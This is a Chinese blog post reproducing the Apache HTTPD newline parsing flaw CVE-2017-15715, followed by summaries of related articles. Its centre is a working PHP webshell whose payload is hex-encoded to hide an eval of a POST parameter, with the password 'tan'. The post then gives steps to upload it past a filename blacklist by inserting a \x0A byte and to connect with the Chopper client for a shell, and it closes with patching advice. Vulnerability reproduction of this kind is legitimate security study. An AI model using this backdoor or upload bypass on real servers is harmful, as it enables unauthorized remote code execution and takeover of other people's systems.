Apache HTTPD 换行解析漏洞(CVE-2017-15715)

最新推荐文章于 2025-05-21 21:16:35 发布
最新推荐文章于 2025-05-21 21:16:35 发布
阅读量381 收藏 9
点赞数 9
分类专栏: 漏洞复现 文章标签: apache 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_29948489/article/details/135876246
版权
文章描述了ApacheHTTPD中的一个PHP解析漏洞,攻击者可利用此漏洞绕过服务器安全策略,通过恶意文件上传实现getshell。修复建议包括升级到最新版本和调整文件命名及权限设置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

马子

<?php
phpinfo();
$a="6576616c2840245f504f53545b2774616e275d293b";
$b="";
for($i=0;$i<strlen($a)-1;$i+=2)
    $b.=chr(hexdec($a[$i].$a[$i+1]));
@eval(`/***xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx***/`.$b);  //密码 tan

?>

上传一个名为evil.php的文件,被拦截:

image-20240122172832743

在evil.php后面插入一个\x0A(注意,不能是\x0D\x0A,只能是一个\x0A),不再拦截:

image-20240122173954077

image-20240122174055709

image-20240122174120030

输入0a后

image-20240122174201070

重新发送后,不在拦截。访问马子并连接。

image-20240122174228247

image-20240122174511742

无回显说明文件存在,使用菜刀getshell即可

后端用了黑名单策略,所以shell.php0x0a可以轻松绕过检测,再利用Apache的换行解析漏洞,使得文件可以被成功解析成php文件,从而成功getshell

修复建议

升级到最新版本

或将上传的文件重命名为为时间戳+随机数+.jpg的格式并禁用上传文件目录执行脚本权限

11-4 Apache换行解析漏洞CVE-2017-15715
weixin_43263566的博客
11-25 1200
Apache換行解析漏洞CVE-2017-15715)是一种解析漏洞,可以影响httpd 2.4.0至2.4.29版本中的PHP解析。攻击者可以通过在上传的文件名中添加特定的换行符,绕过服务器的安全策略,使其被解析成PHP文件而不是普通文件。未正确配置的服务器未对文件名进行适当验证的服务器使用正则表达式并启用Multiline属性的服务器攻击者可以将1.php\x0A作为文件名上传到服务器上,这个文件名看起来像是一个普通的非PHP文件,但是由于其中的特定字符,服务器会将其解析为PHP文件。
漏洞复现(Vulhub)-Apache HTTPD 换行解析漏洞CVE-2017-15715
qq_60848021的博客
09-20 1442
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
CVE-2017-15715Apache HTTPD 换行解析漏洞
2401_86120759的博客
10-21 445
ApacheHTTPD换行解析漏洞CVE-2017-15715Apache HTTPD是一款http服务器,其2.4.0~2.4.29版本中存在一个解析漏洞。在php解析时,将被按照PHP后缀进行解析,直接导致绕过某些安全策略。
05 - vulhub - Apache HTTPD 换行解析漏洞CVE-2017-15715
易编橙 · 终身成长社群,相遇已是上上签!
10-14 709
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,`1.php\x0A`将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache HTTPD 换行漏洞CVE-2017-15715
sleepywin的博客
08-08 369
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Vulhub靶场——apache httpdCVE-2017-15715换行解析漏洞
edsion4的博客
12-05 891
Vulhub靶场——apache httpdCVE-2017-15715换行解析漏洞
Apache HTTPD 换行解析漏洞CVE-2017-15715)复现及利用
weixin_44023460的博客
12-08 858
CVE-2017-15715漏洞可能允许攻击者通过构造特定的恶意文件名来绕过服务器对文件上传的安全限制。在Apache HTTP Server的某些版本中,指令用于匹配文件名模式并执行相应的操作。然而,在某些情况下,该指令可能会错误地将"“字符解释为文件名的一部分,而不是将其视为表示文件名结束的特殊字符。这可能导致服务器错误地匹配到包含”“字符的文件名,即使该文件名后面还有更多的字符。攻击者可以利用这个漏洞在服务器上上传恶意文件。
Apache换行解析漏洞复现(CVE-2017-15715
weixin_57379923的博客
08-04 731
靶机:由 centos7 搭建的 vulhub,IP:192.168.100.40。浏览器访问上传的文件在文件名后添加 %0a 进行访问。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!作 者:PeiyuJue。
Apache HTTPD 换行解析漏洞 CVE-2017-15715 漏洞复现
Senimo
07-27 444
CVE-2017-15715 Apache HTTPD 换行解析漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 Apache HTTPD 是一款 HTTP 服务器,它可以通过 mod_php 来运行 PH P网页。其 2.4.0~2.4.29 版本中存在一个解析漏洞,在解析 PHP 时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 二、漏洞影响 2.4.0 <= Apache HTTPD <= 2.4.29
Apache HTTPD 换行解析漏洞CVE-2017-15715)复现(vulhub)
qq_51398553的博客
06-18 530
可以看到,在该配置文件中,前三行的意思是将所有以.php为后缀的文件内容当作php文件进行解析,但使用$符对文件进行匹配。定位文件末的方法:在右边找到文件名,然后在左边对应的Hex值的后面有0d0a,0d是回车,0a是换行,在0d的前面插入0a。值得注意的是,当我用Tab键补全的时候,终端换行了,也可以说明文件名确实有换行符的存在。从源代码中可以看出,网站对文件的后缀名进行了过滤,将以php,php3,php4,php5,phtml以及pht为后缀的文件名放入黑名单。,拉取镜像,并查看服务相关信息。
apache POI介绍 在JAVA中操作三大办公软件
qq_62374596的博客
05-16 746
Apache POI(Poor Obfuscation Implementation,简称 POI)是一个开源的Java库,它提供了对Microsoft Office格式文件的读写支持。Apache POI使得开发者可以在Java应用程序中操作Microsoft Office文档,如Excel电子表格、Word文档、PowerPoint演示文稿等。
[Web服务器对决] Nginx vs. Apache vs. LiteSpeed:2025年性能、功能与适用场景深度对比
Clownseven的博客
05-20 803
Nginx, Apache, LiteSpeed 哪个更适合你的网站?本指南深度对比这三款主流Web服务器在2025年的架构、并发处理、静态/动态内容性能、配置、安全及HTTP/3支持等,并提供场景化选型建议。
Apache Apisix配置ip-restriction插件以限制IP地址访问
刘元林的博客
05-20 759
ip-restriction插件简介与配置 ip-restriction插件通过白名单或黑名单机制,限制对服务或路由的访问。支持单个IP、多个IP及CIDR范围(如10.10.10.0/24)。主要参数包括whitelist(白名单IP或CIDR)、blacklist(黑名单IP或CIDR)和message(未授权访问时的提示信息)。注意,whitelist和blacklist不能同时使用。 配置步骤: 从config.yaml获取admin_key并存入环境变量。 设置白名单,仅允许特定IP访问,如172
永久免费!专为 Apache Doris 打造的可视化数据管理工具 SelectDB Studio V1.1.0 重磅发布!
SelectDB
05-17 778
SelectDB Studio 专注于为用户提供高效、便捷的可视化操作体验,帮助数据开发者、DBA 低门槛、高效率地对 Apache Doris 及其兼容数据库中的数据进行可视化开发和管理。
apache http client连接池实现原理
最新发布
LeoHan
05-21 612
在Java开发中,处理HTTP请求的常见方式包括使用Java自带的HttpURLConnection、OkHttpClient和Apache HttpClient。其中,Apache HttpClient因其功能强大且易于使用而被广泛采用。通过HttpClientPool类,可以管理HTTP连接池,设置最大连接数和每个路由的最大连接数,并配置请求超时时间。httpCallWithHttpClient方法则负责具体的HTTP请求处理,支持GET和POST方法,并能够处理表单数据和JSON数据。通过Closea
Windows 上安装下载并配置 Apache Maven
hnlucky的博客
05-17 1244
本文详细介绍了如何下载、安装和配置Maven,并验证其安装是否成功。
Jsoup库和Apache HttpClient库有什么区别?
one6688的博客
05-18 898
可以自定义请求头、请求体等,以满足复杂的请求需求。
Linux服务器安全如何加固?禁用不必要的服务与端口如何操作?
2409_89014517的博客
05-17 644
Linux服务器安全如何加固?禁用不必要的服务与端口如何操作?
检测Apache httpd漏洞CVE-2017-9798的工具介绍
1. Apache httpd CVE-2017-9798漏洞(选项出血)的定义和影响范围。 2. 使用Python编写的“snallygaster”工具用于检测Options Bleed漏洞的方法和步骤。 3. 命令行参数的介绍及其具体使用方式,包括如何使用帮助信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值